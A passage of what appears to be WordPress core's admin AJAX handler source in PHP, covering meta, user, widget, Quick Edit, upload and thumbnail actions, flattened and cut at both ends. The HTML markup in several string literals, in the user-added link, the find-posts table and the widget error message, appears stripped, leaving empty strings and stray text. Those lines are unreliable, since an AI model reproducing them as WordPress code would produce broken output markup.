{ wp_die( 0 ); } $menu_items = array(); foreach ( (array) $item_ids as $menu_item_id ) { $menu_obj = get_post( $menu_item_id ); if ( ! empty( $menu_obj->ID ) ) { $menu_obj = wp_setup_nav_menu_item( $menu_obj ); $menu_obj->title = empty( $menu_obj->title ) ? __( 'Menu Item' ) : $menu_obj->title; $menu_obj->label = $menu_obj->title; // Don't show "(pending)" in ajax-added items. $menu_items[] = $menu_obj; } } /** This filter is documented in wp-admin/includes/nav-menu.php */ $walker_class_name = apply_filters( 'wp_edit_nav_menu_walker', 'Walker_Nav_Menu_Edit', $_POST['menu'] ); if ( ! class_exists( $walker_class_name ) ) { wp_die( 0 ); } if ( ! empty( $menu_items ) ) { $args = array( 'after' => '', 'before' => '', 'link_after' => '', 'link_before' => '', 'walker' => new $walker_class_name(), ); echo walk_nav_menu_tree( $menu_items, 0, (object) $args ); } wp_die(); } /** * Handles adding meta via AJAX. * * @since 3.1.0 */ function wp_ajax_add_meta() { check_ajax_referer( 'add-meta', '_ajax_nonce-add-meta' ); $c = 0; $pid = (int) $_POST['post_id']; $post = get_post( $pid ); if ( isset( $_POST['metakeyselect'] ) || isset( $_POST['metakeyinput'] ) ) { if ( ! current_user_can( 'edit_post', $pid ) ) { wp_die( -1 ); } if ( isset( $_POST['metakeyselect'] ) && '#NONE#' === $_POST['metakeyselect'] && empty( $_POST['metakeyinput'] ) ) { wp_die( 1 ); } // If the post is an autodraft, save the post as a draft and then attempt to save the meta. if ( 'auto-draft' === $post->post_status ) { $post_data = array(); $post_data['action'] = 'draft'; // Warning fix. $post_data['post_ID'] = $pid; $post_data['post_type'] = $post->post_type; $post_data['post_status'] = 'draft'; $now = time(); $post_data['post_title'] = sprintf( /* translators: 1: Post creation date, 2: Post creation time. */ __( 'Draft created on %1$s at %2$s' ), gmdate( __( 'F j, Y' ), $now ), gmdate( __( 'g:i a' ), $now ) ); $pid = edit_post( $post_data ); if ( $pid ) { if ( is_wp_error( $pid ) ) { $x = new WP_Ajax_Response( array( 'what' => 'meta', 'data' => $pid, ) ); $x->send(); } $mid = add_meta( $pid ); if ( ! $mid ) { wp_die( __( 'Please provide a custom field value.' ) ); } } else { wp_die( 0 ); } } else { $mid = add_meta( $pid ); if ( ! $mid ) { wp_die( __( 'Please provide a custom field value.' ) ); } } $meta = get_metadata_by_mid( 'post', $mid ); $pid = (int) $meta->post_id; $meta = get_object_vars( $meta ); $x = new WP_Ajax_Response( array( 'what' => 'meta', 'id' => $mid, 'data' => _list_meta_row( $meta, $c ), 'position' => 1, 'supplemental' => array( 'postid' => $pid ), ) ); } else { // Update? $mid = (int) key( $_POST['meta'] ); $key = wp_unslash( $_POST['meta'][ $mid ]['key'] ); $value = wp_unslash( $_POST['meta'][ $mid ]['value'] ); if ( '' === trim( $key ) ) { wp_die( __( 'Please provide a custom field name.' ) ); } $meta = get_metadata_by_mid( 'post', $mid ); if ( ! $meta ) { wp_die( 0 ); // If meta doesn't exist. } if ( is_protected_meta( $meta->meta_key, 'post' ) || is_protected_meta( $key, 'post' ) || ! current_user_can( 'edit_post_meta', $meta->post_id, $meta->meta_key ) || ! current_user_can( 'edit_post_meta', $meta->post_id, $key ) ) { wp_die( -1 ); } if ( $meta->meta_value !== $value || $meta->meta_key !== $key ) { $u = update_metadata_by_mid( 'post', $mid, $value, $key ); if ( ! $u ) { wp_die( 0 ); // We know meta exists; we also know it's unchanged (or DB error, in which case there are bigger problems). } } $x = new WP_Ajax_Response( array( 'what' => 'meta', 'id' => $mid, 'old_id' => $mid, 'data' => _list_meta_row( array( 'meta_key' => $key, 'meta_value' => $value, 'meta_id' => $mid, ), $c ), 'position' => 0, 'supplemental' => array( 'postid' => $meta->post_id ), ) ); } $x->send(); } /** * Handles adding a user via AJAX. * * @since 3.1.0 * * @param string $action Action to perform. */ function wp_ajax_add_user( $action ) { if ( empty( $action ) ) { $action = 'add-user'; } check_ajax_referer( $action ); if ( ! current_user_can( 'create_users' ) ) { wp_die( -1 ); } $user_id = edit_user(); if ( ! $user_id ) { wp_die( 0 ); } elseif ( is_wp_error( $user_id ) ) { $x = new WP_Ajax_Response( array( 'what' => 'user', 'id' => $user_id, ) ); $x->send(); } $user_object = get_userdata( $user_id ); $wp_list_table = _get_list_table( 'WP_Users_List_Table' ); $role = current( $user_object->roles ); $x = new WP_Ajax_Response( array( 'what' => 'user', 'id' => $user_id, 'data' => $wp_list_table->single_row( $user_object, '', $role ), 'supplemental' => array( 'show-link' => sprintf( /* translators: %s: The new user. */ __( 'User %s added' ), '' . $user_object->user_login . '' ), 'role' => $role, ), ) ); $x->send(); } /** * Handles closed post boxes via AJAX. * * @since 3.1.0 */ function wp_ajax_closed_postboxes() { check_ajax_referer( 'closedpostboxes', 'closedpostboxesnonce' ); $closed = isset( $_POST['closed'] ) ? explode( ',', $_POST['closed'] ) : array(); $closed = array_filter( $closed ); $hidden = isset( $_POST['hidden'] ) ? explode( ',', $_POST['hidden'] ) : array(); $hidden = array_filter( $hidden ); $page = isset( $_POST['page'] ) ? $_POST['page'] : ''; if ( sanitize_key( $page ) !== $page ) { wp_die( 0 ); } $user = wp_get_current_user(); if ( ! $user ) { wp_die( -1 ); } if ( is_array( $closed ) ) { update_user_meta( $user->ID, "closedpostboxes_$page", $closed ); } if ( is_array( $hidden ) ) { // Postboxes that are always shown. $hidden = array_diff( $hidden, array( 'submitdiv', 'linksubmitdiv', 'manage-menu', 'create-menu' ) ); update_user_meta( $user->ID, "metaboxhidden_$page", $hidden ); } wp_die( 1 ); } /** * Handles hidden columns via AJAX. * * @since 3.1.0 */ function wp_ajax_hidden_columns() { check_ajax_referer( 'screen-options-nonce', 'screenoptionnonce' ); $page = isset( $_POST['page'] ) ? $_POST['page'] : ''; if ( sanitize_key( $page ) !== $page ) { wp_die( 0 ); } $user = wp_get_current_user(); if ( ! $user ) { wp_die( -1 ); } $hidden = ! empty( $_POST['hidden'] ) ? explode( ',', $_POST['hidden'] ) : array(); update_user_meta( $user->ID, "manage{$page}columnshidden", $hidden ); wp_die( 1 ); } /** * Handles updating whether to display the welcome panel via AJAX. * * @since 3.1.0 */ function wp_ajax_update_welcome_panel() { check_ajax_referer( 'welcome-panel-nonce', 'welcomepanelnonce' ); if ( ! current_user_can( 'edit_theme_options' ) ) { wp_die( -1 ); } update_user_meta( get_current_user_id(), 'show_welcome_panel', empty( $_POST['visible'] ) ? 0 : 1 ); wp_die( 1 ); } /** * Handles for retrieving menu meta boxes via AJAX. * * @since 3.1.0 */ function wp_ajax_menu_get_metabox() { if ( ! current_user_can( 'edit_theme_options' ) ) { wp_die( -1 ); } require_once ABSPATH . 'wp-admin/includes/nav-menu.php'; if ( isset( $_POST['item-type'] ) && 'post_type' === $_POST['item-type'] ) { $type = 'posttype'; $callback = 'wp_nav_menu_item_post_type_meta_box'; $items = (array) get_post_types( array( 'show_in_nav_menus' => true ), 'object' ); } elseif ( isset( $_POST['item-type'] ) && 'taxonomy' === $_POST['item-type'] ) { $type = 'taxonomy'; $callback = 'wp_nav_menu_item_taxonomy_meta_box'; $items = (array) get_taxonomies( array( 'show_ui' => true ), 'object' ); } if ( ! empty( $_POST['item-object'] ) && isset( $items[ $_POST['item-object'] ] ) ) { $menus_meta_box_object = $items[ $_POST['item-object'] ]; /** This filter is documented in wp-admin/includes/nav-menu.php */ $item = apply_filters( 'nav_menu_meta_box_object', $menus_meta_box_object ); $box_args = array( 'id' => 'add-' . $item->name, 'title' => $item->labels->name, 'callback' => $callback, 'args' => $item, ); ob_start(); $callback( null, $box_args ); $markup = ob_get_clean(); echo wp_json_encode( array( 'replace-id' => $type . '-' . $item->name, 'markup' => $markup, ) ); } wp_die(); } /** * Handles internal linking via AJAX. * * @since 3.1.0 */ function wp_ajax_wp_link_ajax() { check_ajax_referer( 'internal-linking', '_ajax_linking_nonce' ); $args = array(); if ( isset( $_POST['search'] ) ) { $args['s'] = wp_unslash( $_POST['search'] ); } if ( isset( $_POST['term'] ) ) { $args['s'] = wp_unslash( $_POST['term'] ); } $args['pagenum'] = ! empty( $_POST['page'] ) ? absint( $_POST['page'] ) : 1; if ( ! class_exists( '_WP_Editors', false ) ) { require ABSPATH . WPINC . '/class-wp-editor.php'; } $results = _WP_Editors::wp_link_query( $args ); if ( ! isset( $results ) ) { wp_die( 0 ); } echo wp_json_encode( $results ); echo "\n"; wp_die(); } /** * Handles saving menu locations via AJAX. * * @since 3.1.0 */ function wp_ajax_menu_locations_save() { if ( ! current_user_can( 'edit_theme_options' ) ) { wp_die( -1 ); } check_ajax_referer( 'add-menu_item', 'menu-settings-column-nonce' ); if ( ! isset( $_POST['menu-locations'] ) ) { wp_die( 0 ); } set_theme_mod( 'nav_menu_locations', array_map( 'absint', $_POST['menu-locations'] ) ); wp_die( 1 ); } /** * Handles saving the meta box order via AJAX. * * @since 3.1.0 */ function wp_ajax_meta_box_order() { check_ajax_referer( 'meta-box-order' ); $order = isset( $_POST['order'] ) ? (array) $_POST['order'] : false; $page_columns = isset( $_POST['page_columns'] ) ? $_POST['page_columns'] : 'auto'; if ( 'auto' !== $page_columns ) { $page_columns = (int) $page_columns; } $page = isset( $_POST['page'] ) ? $_POST['page'] : ''; if ( sanitize_key( $page ) !== $page ) { wp_die( 0 ); } $user = wp_get_current_user(); if ( ! $user ) { wp_die( -1 ); } if ( $order ) { update_user_meta( $user->ID, "meta-box-order_$page", $order ); } if ( $page_columns ) { update_user_meta( $user->ID, "screen_layout_$page", $page_columns ); } wp_send_json_success(); } /** * Handles menu quick searching via AJAX. * * @since 3.1.0 */ function wp_ajax_menu_quick_search() { if ( ! current_user_can( 'edit_theme_options' ) ) { wp_die( -1 ); } require_once ABSPATH . 'wp-admin/includes/nav-menu.php'; _wp_ajax_menu_quick_search( $_POST ); wp_die(); } /** * Handles retrieving a permalink via AJAX. * * @since 3.1.0 */ function wp_ajax_get_permalink() { check_ajax_referer( 'getpermalink', 'getpermalinknonce' ); $post_id = isset( $_POST['post_id'] ) ? (int) $_POST['post_id'] : 0; wp_die( get_preview_post_link( $post_id ) ); } /** * Handles retrieving a sample permalink via AJAX. * * @since 3.1.0 */ function wp_ajax_sample_permalink() { check_ajax_referer( 'samplepermalink', 'samplepermalinknonce' ); $post_id = isset( $_POST['post_id'] ) ? (int) $_POST['post_id'] : 0; $title = isset( $_POST['new_title'] ) ? $_POST['new_title'] : ''; $slug = isset( $_POST['new_slug'] ) ? $_POST['new_slug'] : null; wp_die( get_sample_permalink_html( $post_id, $title, $slug ) ); } /** * Handles Quick Edit saving a post from a list table via AJAX. * * @since 3.1.0 * * @global string $mode List table view mode. */ function wp_ajax_inline_save() { global $mode; check_ajax_referer( 'inlineeditnonce', '_inline_edit' ); if ( ! isset( $_POST['post_ID'] ) || ! (int) $_POST['post_ID'] ) { wp_die(); } $post_id = (int) $_POST['post_ID']; if ( 'page' === $_POST['post_type'] ) { if ( ! current_user_can( 'edit_page', $post_id ) ) { wp_die( __( 'Sorry, you are not allowed to edit this page.' ) ); } } else { if ( ! current_user_can( 'edit_post', $post_id ) ) { wp_die( __( 'Sorry, you are not allowed to edit this post.' ) ); } } $last = wp_check_post_lock( $post_id ); if ( $last ) { $last_user = get_userdata( $last ); $last_user_name = $last_user ? $last_user->display_name : __( 'Someone' ); /* translators: %s: User's display name. */ $msg_template = __( 'Saving is disabled: %s is currently editing this post.' ); if ( 'page' === $_POST['post_type'] ) { /* translators: %s: User's display name. */ $msg_template = __( 'Saving is disabled: %s is currently editing this page.' ); } printf( $msg_template, esc_html( $last_user_name ) ); wp_die(); } $data = &$_POST; $post = get_post( $post_id, ARRAY_A ); // Since it's coming from the database. $post = wp_slash( $post ); $data['content'] = $post['post_content']; $data['excerpt'] = $post['post_excerpt']; // Rename. $data['user_ID'] = get_current_user_id(); if ( isset( $data['post_parent'] ) ) { $data['parent_id'] = $data['post_parent']; } // Status. if ( isset( $data['keep_private'] ) && 'private' === $data['keep_private'] ) { $data['visibility'] = 'private'; $data['post_status'] = 'private'; } elseif ( isset( $data['_status'] ) ) { $data['post_status'] = $data['_status']; } if ( empty( $data['comment_status'] ) ) { $data['comment_status'] = 'closed'; } if ( empty( $data['ping_status'] ) ) { $data['ping_status'] = 'closed'; } // Exclude terms from taxonomies that are not supposed to appear in Quick Edit. if ( ! empty( $data['tax_input'] ) ) { foreach ( $data['tax_input'] as $taxonomy => $terms ) { $tax_object = get_taxonomy( $taxonomy ); /** This filter is documented in wp-admin/includes/class-wp-posts-list-table.php */ if ( ! apply_filters( 'quick_edit_show_taxonomy', $tax_object->show_in_quick_edit, $taxonomy, $post['post_type'] ) ) { unset( $data['tax_input'][ $taxonomy ] ); } } } // Hack: wp_unique_post_slug() doesn't work for drafts, so we will fake that our post is published. if ( ! empty( $data['post_name'] ) && in_array( $post['post_status'], array( 'draft', 'pending' ), true ) ) { $post['post_status'] = 'publish'; $data['post_name'] = wp_unique_post_slug( $data['post_name'], $post['ID'], $post['post_status'], $post['post_type'], $post['post_parent'] ); } // Update the post. edit_post(); $wp_list_table = _get_list_table( 'WP_Posts_List_Table', array( 'screen' => $_POST['screen'] ) ); $mode = 'excerpt' === $_POST['post_view'] ? 'excerpt' : 'list'; $level = 0; if ( is_post_type_hierarchical( $wp_list_table->screen->post_type ) ) { $request_post = array( get_post( $_POST['post_ID'] ) ); $parent = $request_post[0]->post_parent; while ( $parent > 0 ) { $parent_post = get_post( $parent ); $parent = $parent_post->post_parent; ++$level; } } $wp_list_table->display_rows( array( get_post( $_POST['post_ID'] ) ), $level ); wp_die(); } /** * Handles Quick Edit saving for a term via AJAX. * * @since 3.1.0 */ function wp_ajax_inline_save_tax() { check_ajax_referer( 'taxinlineeditnonce', '_inline_edit' ); $taxonomy = sanitize_key( $_POST['taxonomy'] ); $taxonomy_object = get_taxonomy( $taxonomy ); if ( ! $taxonomy_object ) { wp_die( 0 ); } if ( ! isset( $_POST['tax_ID'] ) || ! (int) $_POST['tax_ID'] ) { wp_die( -1 ); } $id = (int) $_POST['tax_ID']; if ( ! current_user_can( 'edit_term', $id ) ) { wp_die( -1 ); } $wp_list_table = _get_list_table( 'WP_Terms_List_Table', array( 'screen' => 'edit-' . $taxonomy ) ); $tag = get_term( $id, $taxonomy ); $_POST['description'] = $tag->description; $updated = wp_update_term( $id, $taxonomy, $_POST ); if ( $updated && ! is_wp_error( $updated ) ) { $tag = get_term( $updated['term_id'], $taxonomy ); if ( ! $tag || is_wp_error( $tag ) ) { if ( is_wp_error( $tag ) && $tag->get_error_message() ) { wp_die( $tag->get_error_message() ); } wp_die( __( 'Item not updated.' ) ); } } else { if ( is_wp_error( $updated ) && $updated->get_error_message() ) { wp_die( $updated->get_error_message() ); } wp_die( __( 'Item not updated.' ) ); } $level = 0; $parent = $tag->parent; while ( $parent > 0 ) { $parent_tag = get_term( $parent, $taxonomy ); $parent = $parent_tag->parent; ++$level; } $wp_list_table->single_row( $tag, $level ); wp_die(); } /** * Handles querying posts for the Find Posts modal via AJAX. * * @see window.findPosts * * @since 3.1.0 */ function wp_ajax_find_posts() { check_ajax_referer( 'find-posts' ); $post_types = get_post_types( array( 'public' => true ), 'objects' ); unset( $post_types['attachment'] ); $args = array( 'post_type' => array_keys( $post_types ), 'post_status' => 'any', 'posts_per_page' => 50, ); $search = wp_unslash( $_POST['ps'] ); if ( '' !== $search ) { $args['s'] = $search; } $posts = get_posts( $args ); if ( ! $posts ) { wp_send_json_error( __( 'No items found.' ) ); } $html = ''; $alt = ''; foreach ( $posts as $post ) { $title = trim( $post->post_title ) ? $post->post_title : __( '(no title)' ); $alt = ( 'alternate' === $alt ) ? '' : 'alternate'; switch ( $post->post_status ) { case 'publish': case 'private': $stat = __( 'Published' ); break; case 'future': $stat = __( 'Scheduled' ); break; case 'pending': $stat = __( 'Pending Review' ); break; case 'draft': $stat = __( 'Draft' ); break; } if ( '0000-00-00 00:00:00' === $post->post_date ) { $time = ''; } else { /* translators: Date format in table columns, see https://www.php.net/manual/datetime.format.php */ $time = mysql2date( __( 'Y/m/d' ), $post->post_date ); } $html .= ''; $html .= '' . "\n\n"; } $html .= '

    		' . __( 'Title' ) . '' . __( 'Type' ) . '' . __( 'Date' ) . '' . __( 'Status' ) . '
    ' . esc_html( $post_types[ $post->post_type ]->labels->singular_name ) . '' . esc_html( $time ) . '' . esc_html( $stat ) . '
    '; wp_send_json_success( $html ); } /** * Handles saving the widgets order via AJAX. * * @since 3.1.0 */ function wp_ajax_widgets_order() { check_ajax_referer( 'save-sidebar-widgets', 'savewidgets' ); if ( ! current_user_can( 'edit_theme_options' ) ) { wp_die( -1 ); } unset( $_POST['savewidgets'], $_POST['action'] ); // Save widgets order for all sidebars. if ( is_array( $_POST['sidebars'] ) ) { $sidebars = array(); foreach ( wp_unslash( $_POST['sidebars'] ) as $key => $val ) { $sb = array(); if ( ! empty( $val ) ) { $val = explode( ',', $val ); foreach ( $val as $k => $v ) { if ( ! str_contains( $v, 'widget-' ) ) { continue; } $sb[ $k ] = substr( $v, strpos( $v, '_' ) + 1 ); } } $sidebars[ $key ] = $sb; } wp_set_sidebars_widgets( $sidebars ); wp_die( 1 ); } wp_die( -1 ); } /** * Handles saving a widget via AJAX. * * @since 3.1.0 * * @global array $wp_registered_widgets * @global array $wp_registered_widget_controls * @global array $wp_registered_widget_updates */ function wp_ajax_save_widget() { global $wp_registered_widgets, $wp_registered_widget_controls, $wp_registered_widget_updates; check_ajax_referer( 'save-sidebar-widgets', 'savewidgets' ); if ( ! current_user_can( 'edit_theme_options' ) || ! isset( $_POST['id_base'] ) ) { wp_die( -1 ); } unset( $_POST['savewidgets'], $_POST['action'] ); /** * Fires early when editing the widgets displayed in sidebars. * * @since 2.8.0 */ do_action( 'load-widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores /** * Fires early when editing the widgets displayed in sidebars. * * @since 2.8.0 */ do_action( 'widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores /** This action is documented in wp-admin/widgets.php */ do_action( 'sidebar_admin_setup' ); $id_base = wp_unslash( $_POST['id_base'] ); $widget_id = wp_unslash( $_POST['widget-id'] ); $sidebar_id = $_POST['sidebar']; $multi_number = ! empty( $_POST['multi_number'] ) ? (int) $_POST['multi_number'] : 0; $settings = isset( $_POST[ 'widget-' . $id_base ] ) && is_array( $_POST[ 'widget-' . $id_base ] ) ? $_POST[ 'widget-' . $id_base ] : false; $error = '

    ' . __( 'An error has occurred. Please reload the page and try again.' ) . '

    '; $sidebars = wp_get_sidebars_widgets(); $sidebar = isset( $sidebars[ $sidebar_id ] ) ? $sidebars[ $sidebar_id ] : array(); // Delete. if ( isset( $_POST['delete_widget'] ) && $_POST['delete_widget'] ) { if ( ! isset( $wp_registered_widgets[ $widget_id ] ) ) { wp_die( $error ); } $sidebar = array_diff( $sidebar, array( $widget_id ) ); $_POST = array( 'sidebar' => $sidebar_id, 'widget-' . $id_base => array(), 'the-widget-id' => $widget_id, 'delete_widget' => '1', ); /** This action is documented in wp-admin/widgets.php */ do_action( 'delete_widget', $widget_id, $sidebar_id, $id_base ); } elseif ( $settings && preg_match( '/__i__|%i%/', key( $settings ) ) ) { if ( ! $multi_number ) { wp_die( $error ); } $_POST[ 'widget-' . $id_base ] = array( $multi_number => reset( $settings ) ); $widget_id = $id_base . '-' . $multi_number; $sidebar[] = $widget_id; } $_POST['widget-id'] = $sidebar; foreach ( (array) $wp_registered_widget_updates as $name => $control ) { if ( $name === $id_base ) { if ( ! is_callable( $control['callback'] ) ) { continue; } ob_start(); call_user_func_array( $control['callback'], $control['params'] ); ob_end_clean(); break; } } if ( isset( $_POST['delete_widget'] ) && $_POST['delete_widget'] ) { $sidebars[ $sidebar_id ] = $sidebar; wp_set_sidebars_widgets( $sidebars ); echo "deleted:$widget_id"; wp_die(); } if ( ! empty( $_POST['add_new'] ) ) { wp_die(); } $form = $wp_registered_widget_controls[ $widget_id ]; if ( $form ) { call_user_func_array( $form['callback'], $form['params'] ); } wp_die(); } /** * Handles updating a widget via AJAX. * * @since 3.9.0 * * @global WP_Customize_Manager $wp_customize */ function wp_ajax_update_widget() { global $wp_customize; $wp_customize->widgets->wp_ajax_update_widget(); } /** * Handles removing inactive widgets via AJAX. * * @since 4.4.0 */ function wp_ajax_delete_inactive_widgets() { check_ajax_referer( 'remove-inactive-widgets', 'removeinactivewidgets' ); if ( ! current_user_can( 'edit_theme_options' ) ) { wp_die( -1 ); } unset( $_POST['removeinactivewidgets'], $_POST['action'] ); /** This action is documented in wp-admin/includes/ajax-actions.php */ do_action( 'load-widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores /** This action is documented in wp-admin/includes/ajax-actions.php */ do_action( 'widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores /** This action is documented in wp-admin/widgets.php */ do_action( 'sidebar_admin_setup' ); $sidebars_widgets = wp_get_sidebars_widgets(); foreach ( $sidebars_widgets['wp_inactive_widgets'] as $key => $widget_id ) { $pieces = explode( '-', $widget_id ); $multi_number = array_pop( $pieces ); $id_base = implode( '-', $pieces ); $widget = get_option( 'widget_' . $id_base ); unset( $widget[ $multi_number ] ); update_option( 'widget_' . $id_base, $widget ); unset( $sidebars_widgets['wp_inactive_widgets'][ $key ] ); } wp_set_sidebars_widgets( $sidebars_widgets ); wp_die(); } /** * Handles creating missing image sub-sizes for just uploaded images via AJAX. * * @since 5.3.0 */ function wp_ajax_media_create_image_subsizes() { check_ajax_referer( 'media-form' ); if ( ! current_user_can( 'upload_files' ) ) { wp_send_json_error( array( 'message' => __( 'Sorry, you are not allowed to upload files.' ) ) ); } if ( empty( $_POST['attachment_id'] ) ) { wp_send_json_error( array( 'message' => __( 'Upload failed. Please reload and try again.' ) ) ); } $attachment_id = (int) $_POST['attachment_id']; if ( ! empty( $_POST['_wp_upload_failed_cleanup'] ) ) { // Upload failed. Cleanup. if ( wp_attachment_is_image( $attachment_id ) && current_user_can( 'delete_post', $attachment_id ) ) { $attachment = get_post( $attachment_id ); // Created at most 10 min ago. if ( $attachment && ( time() - strtotime( $attachment->post_date_gmt ) < 600 ) ) { wp_delete_attachment( $attachment_id, true ); wp_send_json_success(); } } } /* * Set a custom header with the attachment_id. * Used by the browser/client to resume creating image sub-sizes after a PHP fatal error. */ if ( ! headers_sent() ) { header( 'X-WP-Upload-Attachment-ID: ' . $attachment_id ); } /* * This can still be pretty slow and cause timeout or out of memory errors. * The js that handles the response would need to also handle HTTP 500 errors. */ wp_update_image_subsizes( $attachment_id ); if ( ! empty( $_POST['_legacy_support'] ) ) { // The old (inline) uploader. Only needs the attachment_id. $response = array( 'id' => $attachment_id ); } else { // Media modal and Media Library grid view. $response = wp_prepare_attachment_for_js( $attachment_id ); if ( ! $response ) { wp_send_json_error( array( 'message' => __( 'Upload failed.' ) ) ); } } // At this point the image has been uploaded successfully. wp_send_json_success( $response ); } /** * Handles uploading attachments via AJAX. * * @since 3.3.0 */ function wp_ajax_upload_attachment() { check_ajax_referer( 'media-form' ); /* * This function does not use wp_send_json_success() / wp_send_json_error() * as the html4 Plupload handler requires a text/html Content-Type for older IE. * See https://core.trac.wordpress.org/ticket/31037 */ if ( ! current_user_can( 'upload_files' ) ) { echo wp_json_encode( array( 'success' => false, 'data' => array( 'message' => __( 'Sorry, you are not allowed to upload files.' ), 'filename' => esc_html( $_FILES['async-upload']['name'] ), ), ) ); wp_die(); } if ( isset( $_REQUEST['post_id'] ) ) { $post_id = $_REQUEST['post_id']; if ( ! current_user_can( 'edit_post', $post_id ) ) { echo wp_json_encode( array( 'success' => false, 'data' => array( 'message' => __( 'Sorry, you are not allowed to attach files to this post.' ), 'filename' => esc_html( $_FILES['async-upload']['name'] ), ), ) ); wp_die(); } } else { $post_id = null; } $post_data = ! empty( $_REQUEST['post_data'] ) ? _wp_get_allowed_postdata( _wp_translate_postdata( false, (array) $_REQUEST['post_data'] ) ) : array(); if ( is_wp_error( $post_data ) ) { wp_die( $post_data->get_error_message() ); } // If the context is custom header or background, make sure the uploaded file is an image. if ( isset( $post_data['context'] ) && in_array( $post_data['context'], array( 'custom-header', 'custom-background' ), true ) ) { $wp_filetype = wp_check_filetype_and_ext( $_FILES['async-upload']['tmp_name'], $_FILES['async-upload']['name'] ); if ( ! wp_match_mime_types( 'image', $wp_filetype['type'] ) ) { echo wp_json_encode( array( 'success' => false, 'data' => array( 'message' => __( 'The uploaded file is not a valid image. Please try again.' ), 'filename' => esc_html( $_FILES['async-upload']['name'] ), ), ) ); wp_die(); } } $attachment_id = media_handle_upload( 'async-upload', $post_id, $post_data ); if ( is_wp_error( $attachment_id ) ) { echo wp_json_encode( array( 'success' => false, 'data' => array( 'message' => $attachment_id->get_error_message(), 'filename' => esc_html( $_FILES['async-upload']['name'] ), ), ) ); wp_die(); } if ( isset( $post_data['context'] ) && isset( $post_data['theme'] ) ) { if ( 'custom-background' === $post_data['context'] ) { update_post_meta( $attachment_id, '_wp_attachment_is_custom_background', $post_data['theme'] ); } if ( 'custom-header' === $post_data['context'] ) { update_post_meta( $attachment_id, '_wp_attachment_is_custom_header', $post_data['theme'] ); } } $attachment = wp_prepare_attachment_for_js( $attachment_id ); if ( ! $attachment ) { wp_die(); } echo wp_json_encode( array( 'success' => true, 'data' => $attachment, ) ); wp_die(); } /** * Handles image editing via AJAX. * * @since 3.1.0 */ function wp_ajax_image_editor() { $attachment_id = (int) $_POST['postid']; if ( empty( $attachment_id ) || ! current_user_can( 'edit_post', $attachment_id ) ) { wp_die( -1 ); } check_ajax_referer( "image_editor-$attachment_id" ); require_once ABSPATH . 'wp-admin/includes/image-edit.php'; $msg = false; switch ( $_POST['do'] ) { case 'save': $msg = wp_save_image( $attachment_id ); if ( ! empty( $msg->error ) ) { wp_send_json_error( $msg ); } wp_send_json_success( $msg ); break; case 'scale': $msg = wp_save_image( $attachment_id ); break; case 'restore': $msg = wp_restore_image( $attachment_id ); break; } ob_start(); wp_image_editor( $attachment_id, $msg ); $html = ob_get_clean(); if ( ! empty( $msg->error ) ) { wp_send_json_error( array( 'message' => $msg, 'html' => $html, ) ); } wp_send_json_success( array( 'message' => $msg, 'html' => $html, ) ); } /** * Handles setting the featured image via AJAX. * * @since 3.1.0 */ function wp_ajax_set_post_thumbnail() { $json = ! empty( $_REQUEST['json'] ); // New-style request. $post_id = (int) $_POST['post_id']; if ( ! current_user_can( 'edit_post', $post_id ) ) { wp_die( -1 ); } $thumbnail_id = (int) $_POST['thumbnail_id']; if ( $json ) { check_ajax_referer( "update-post_$post_id" ); } else { check_ajax_referer( "set_post_thumbnail-$post_id" ); } if ( -1 === $thumbnail_id ) { if ( delete_post_thumbnail( $post_id ) ) { $return = _wp_post_thumbnail_html( null, $post_id ); $json ? wp_send_json_success( $return ) : wp_die( $return ); } else { wp_die( 0 ); } } if ( set_post_thumbnail( $post_id, $thumbnail_id ) ) { $return = _wp_post_thumbnail_html( $thumbnail_id, $post_id ); $json ? wp_send_json_success( $return ) : wp_die( $return ); } wp_die( 0 ); } /** * Handles retrieving HTML for the featured image via AJAX. * * @since 4.6.0 */ function wp_ajax_get_post_thumbnail_html() { $post_id = (int) $_POST['post_id']; check_ajax_referer( "update-post_$post_id" ); if ( ! current_user_can( 'edit_post', $post_id ) ) { wp_die( -1 ); } $thumbnail_id = (int) $_POST['thumbnail_id']; // For backward compatibility, -1 refers to no featured image. if ( -1 === $thumbnail_id ) { $thumbnail_id = null; } $return = _wp_post_thumbnail_html( $thumbnail_id, $post_id ); wp_send_json_success( $return ); } /** * Handles setting the featured image for an attachment via AJAX. * * @since 4.0.0 * * @see set_post_thumbnail() */ function wp_ajax_set_attachment_thumbnail() { if ( empty( $_POST['urls'] ) || ! is_array( $_POST['urls'] ) ) { wp_send_json_error(); } $thumbnail_id = (int) $_POST['thumbnail_id']; if ( empty( $thumbnail_id ) ) { wp_send_json_error(); } if ( false === check_ajax_referer( 'set-attachment-thumbnail', '_ajax_nonce', false ) ) { wp_send_json_error(); } $post_ids = array(); // For each URL, try to find its corresponding post ID. foreach ( $_POST['urls'] as $url ) { $post_id = attachment_url_to_postid( $url ); if ( ! empty( $post_id ) ) { $post_ids[] = $post_id; } } if ( empty( $post_ids ) ) { wp_send_json_error(); } $success = 0; // For each found attachment, set its thumbnail. foreach ( $post_ids as $post_id ) { if ( ! current_user_can( 'edit_post', $post_id ) ) { continue; } if ( set_post_thumbnail( $post_id, $thumbnail_id ) ) { ++$success; } } if ( 0 === $success ) { wp_send_json_error(); } else { wp_send_json_success(); } wp_send_json_error(); } /** * Handles formatting a date via AJAX. * * @since 3.1.0 */ function wp_ajax_date_format() { wp_die( date_i18n( sanitize_option( 'date_format', wp_unslash( $_POST['date'] ) ) ) ); } /** * Handles formatting a time via AJAX. * * @since 3.1.0 */ function wp_ajax_time_format() { wp_die( date_i18n( sanitize_option( 'time_format', wp_unslash( $_POST['date'] ) ) ) ); } /** * Handles saving posts from the fullscreen editor via AJAX. * * @since 3.1.0 * @deprecated 4.3.0 */ function wp_ajax_wp_fullscreen_save_post() { $post_id = isset( $_POST['post_ID'] ) ? (int) $_POST['post_ID'] : 0; $post = null; if ( $post_id ) { $post = get_post( $post_id ); } check_ajax_referer( 'update-post_' . $post_id, '_wpnonce' ); $post_id = edit_post(); if ( is_wp_error( $post_id ) ) { wp_send_json_error(); } if ( $post ) { $last_date = mysql2date( __( 'F j, Y' ), $post->post_modified ); $last_time = mysql2date( __( 'g:i a' ), $post->post_modified ); } else { $last_date = date_i18n( __( 'F j, Y' ) ); $last_time = date_i18n( __( 'g:i a' ) ); } $last_id = get_post_meta( $post_id, '_edit_last', true ); if ( $last_id ) { $last_user = get_userdata( $last_id ); /* translators: 